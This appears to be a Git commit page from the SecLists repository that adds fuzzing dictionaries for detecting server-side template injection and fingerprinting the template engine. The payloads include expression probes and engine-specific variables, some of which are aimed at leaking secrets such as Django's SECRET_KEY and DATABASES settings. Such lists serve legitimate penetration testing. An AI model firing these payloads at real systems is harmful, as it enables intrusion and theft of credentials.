admin/SecLists
1
0
Fork 0
mirror of https://github.com/danielmiessler/SecLists.git synced 2025-06-08 05:57:52 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #501 from righettod/master

Browse Source 
Add payloads to identify the template engine used

- https://portswigger.net/research/server-side-template-injection
- https://github.com/epinna/tplmap
This commit is contained in:
g0tmi1k 2020-09-16 07:23:39 +01:00 committed by GitHub
commit 0b7d119f74
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 80 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
Fuzzing/template-engines-expression.txt
View File

@ -7,3 +7,5 @@ ${42*42}
<%=42*42 %> <%=42*42 %>
{{=42*42}} {{=42*42}}
{^xyzm42}1764{/xyzm42} {^xyzm42}1764{/xyzm42}
${donotexists|42*42}
[[${42*42}]]

78
Fuzzing/template-engines-special-vars.txt Normal file
View File

@ -0,0 +1,78 @@
# The objective of this dictionary is to help to discover the template engine used
# once a evaluation of a template expression was detected via the following dictionary:
# https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-expression.txt
# Special variables are grouped by template engine in order to facilitate the identification.
# Use the term between the expression syntax identified as evaluated like "{{ xxx }}" for example.
#
# Indicate to your fuzzer to ignore a line starting with: "# " (space is important)
# You can also filter the dictionary before to use it via the command: grep -v "# " > dict.txt
#
# Sources:
# https://portswigger.net/research/server-side-template-injection
# https://github.com/epinna/tplmap
# Custom personal labs
#
# GENERIC: To cause an error and perhaps get technical information
1/0
# FREEMARKER (JAVA)
# https://freemarker.apache.org/docs/ref_specvar.html
.version
.current_template_name
.locale_object
# JINJA2 (PYTHON)
# https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement
# https://stackoverflow.com/a/40346872/451455
self._TemplateReference__context
# DJANGO (PYTHON)
# https://docs.djangoproject.com/en/3.1/ref/settings/
settings
settings.DEBUG
settings.DATABASES
settings.SECRET_KEY
# PUG (NODEJS)
# https://pugjs.org
# In case of hit then use "Object.keys(VAR_NAME)" to explore the object properties
# Self object is available if the "self" options is set to true
self
# Payload below are more NodeJS related
locals
global
# ERB (RUBY)
# https://ruby-doc.org/stdlib-2.7.1/libdoc/erb/rdoc/ERB.html
ERB.version()
# TORNADO (PYTHON)
# https://www.tornadoweb.org/en/stable/template.html
# Presence of variables with a name starting with "_tt_" indicate usage of Tornado
locals()
globals()
# TWIG (PHP)
# https://twig.symfony.com/doc/3.x/
_self
_self.getTemplateName().__toString
_context
_context|length
_context|keys|first
constant('Twig_Environment::VERSION')
constant('Twig_Environment::VERSION_ID')
constant('Twig_Environment::EXTRA_VERSION')
# VELOCITY (JAVA)
# http://velocity.apache.org/tools/devel/generic.html
$context.keys
$context.TOOLS_VERSION
$field.in("org.apache.velocity.runtime.VelocityEngineVersion")
$field.in("org.apache.velocity.runtime.RuntimeConstants")
# THYMELEAF (JAVA)
# https://www.thymeleaf.org/doc/tutorials/3.0/usingthymeleaf.html#variables
# https://www.thymeleaf.org/doc/tutorials/3.0/usingthymeleaf.html#execution-info
#execInfo
#execInfo.templateStack
#execInfo.templateStack[0].getClass.forName("org.thymeleaf.Thymeleaf").getField("VERSION").get(null)
execInfo
execInfo.templateStack
execInfo.templateStack[0].getClass.forName("org.thymeleaf.Thymeleaf").getField("VERSION").get(null)
# SMARTY (PHP)
# https://www.smarty.net/docs/en/language.syntax.variables.tpl
# https://www.smarty.net/docs/en/language.variables.smarty.tpl#language.variables.smarty.config
$smarty.version
$smarty.config
$smarty.template